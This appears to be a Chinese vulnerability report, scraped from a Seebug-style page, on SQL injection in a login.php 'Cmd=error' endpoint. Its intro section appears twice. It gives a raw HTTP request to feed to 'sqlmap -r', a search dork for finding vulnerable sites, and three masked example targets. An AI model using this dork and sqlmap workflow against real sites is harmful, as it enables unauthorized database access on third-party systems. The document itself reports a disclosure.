VULHUB ™

### 简要描述： RT ### 详细说明： ``` GET /login.php?Cmd=error&Code=-1&Lang= HTTP/1.1 Host: **.**.**.** Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 Accept-Encoding: gzip, deflate, sdch Accept-Language: zh-CN,zh;q=0.8,es;q=0.6,fr;q=0.4,vi;q=0.2 Cookie: domain=admin; Hm_lvt_44f9b083c78d9d3c1e736e5ae3a4aff8=1442311545; PHPSESSID=81ooh6cslbmb1uple6k6rlaad1; LoginDomain=**.**.**.**# X-Forwarded-For: **.**.**.** X-Remote-Addr: **.**.**.** X-Originating-IP: **.**.**.** X-Remote-IP: **.**.**.** ``` 保存为1.txt，然后sqlmap -r 1.txt [<img src="https://images.seebug.org/upload/201510/16164958b5e30864a87ce6cb3e8a56015a2c6532.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/16164958b5e30864a87ce6cb3e8a56015a2c6532.png) ### 漏洞证明：...

### 简要描述： RT ### 详细说明： ``` GET /login.php?Cmd=error&Code=-1&Lang= HTTP/1.1 Host: **.**.**.** Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 Accept-Encoding: gzip, deflate, sdch Accept-Language: zh-CN,zh;q=0.8,es;q=0.6,fr;q=0.4,vi;q=0.2 Cookie: domain=admin; Hm_lvt_44f9b083c78d9d3c1e736e5ae3a4aff8=1442311545; PHPSESSID=81ooh6cslbmb1uple6k6rlaad1; LoginDomain=**.**.**.**# X-Forwarded-For: **.**.**.** X-Remote-Addr: **.**.**.** X-Originating-IP: **.**.**.** X-Remote-IP: **.**.**.** ``` 保存为1.txt，然后sqlmap -r 1.txt [<img src="https://images.seebug.org/upload/201510/16164958b5e30864a87ce6cb3e8a56015a2c6532.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/16164958b5e30864a87ce6cb3e8a56015a2c6532.png) ### 漏洞证明： 根据关键字查找inurl:login.php?Cmd=error 提供三个案例。其他的并没有一一进行测试 http://**.**.**.**/login.php?Cmd=error&Code=-1 http://**.**.**.**/login.php?Cmd=error&Code=-3&Lang= http://**.**.**.**/login.php?Cmd=error&Code=-3 [<img src="https://images.seebug.org/upload/201510/16164958b5e30864a87ce6cb3e8a56015a2c6532.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/16164958b5e30864a87ce6cb3e8a56015a2c6532.png) http://**.**.**.**/login.php?Cmd=error&Code=-1 [<img src="https://images.seebug.org/upload/201510/1513464400c6077faced4f302f99aff2e18bf274.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/1513464400c6077faced4f302f99aff2e18bf274.png) [<img src="https://images.seebug.org/upload/201510/15141603407624a38bd1e4e3fb8dbab192879d93.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/15141603407624a38bd1e4e3fb8dbab192879d93.png)